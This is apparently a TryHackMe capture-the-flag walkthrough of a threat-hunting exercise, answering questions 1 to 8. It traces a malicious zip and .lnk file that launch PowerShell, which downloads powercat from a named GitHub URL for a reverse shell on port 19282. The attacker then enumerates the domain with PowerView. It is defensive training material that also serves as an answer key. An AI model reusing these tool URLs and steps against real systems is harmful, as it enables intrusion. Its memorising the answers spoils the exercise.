THM : Hunt Me I: Payment Collectors Part. 1
Scenario : A Senior Finance Director from a company downloaded a malicious zip. We are called to conduct an investigation.
This walk-through covers question 1 to 8. See Part. 2 for question 9 to 14.
1. What was the name of the ZIP attachment that Michael downloaded?
We need to find the ZIP file that Michael downloaded. We first start by setting the user.name to michael.ascot and search for any log that contain “.zip”. By sorting from older to newer, we find the name of the suspicious zip file downloaded : Invoice_AT_2023–227.zip.
From the above screenshot, we can also see the extracted file from the zip archive : ‘Payment_Invoice.pdf.lnk.lnk’
2. What was the contained file that Michael extracted from the attachment?
From the above : Answer : Payment_Invoice.pdf.lnk.lnk’
3. What was the name of the command-line process that spawned from the extracted file attachment?
Now that we have the log showcasing the extraction of the log file, we can see its surrounding documents to see if anything suspicious happened. We discover a suspicious usage of powershell.exe and a download from a suspicious URL.
Answer : powershell.exe
4. What URL did the attacker use to download a tool to establish a reverse shell connection?
From the question 3, we know that the attacker download a suspicious file to establish a reverse shell.
Answer : https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
5. What port did the workstation connect to the attacker on?
We will now hunt for any usage of the download file.
By analyzing any powercat.ps1 command line usage, we directly see that the used port for the communication is 19282.
Answer : 19282.
6. What was the first native Windows binary the attacker ran for system enumeration after obtaining remote access?
We need to search for a native binary that the attacker used, in other word a process creation event happened. We can search for process creation using the query :
“winlog.event_id: 1”.
Given the result, we will follow the process creation from old to new and we can rapidly see the first call to the reverse shell followed by interesting process creation.
Answer : systeminfo.exe
Side note : By looking at the next logs of our current search, we find that the attacker used net.exe to map a share file. We will come to it in question 8.
7. What is the URL of the script that the attacker downloads to enumerate the domain?
The first step here is to find out what file are we talking about. So I visualized the file.path field and it turned out that a specific file was in majority present : PowerView.ps1
Now that we have the file name, let’s just search for it using *PowerView.ps1*. Let’s now sort from old to new and look at the logs at the beginning. The second one contains what we are looking for ! The download link.
Answer : https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1
8. What was the name of the file share that the attacker mapped to Michael’s workstation?
So as stated in question 6, the attacker maps a share to the workstation of Michael as seen in image next.
End of the first part. Part 2 can be found here : https://medium.com/@MDK_BE/thm-hunt-me-i-payment-collectors-part-2-d5bff2ce55bf
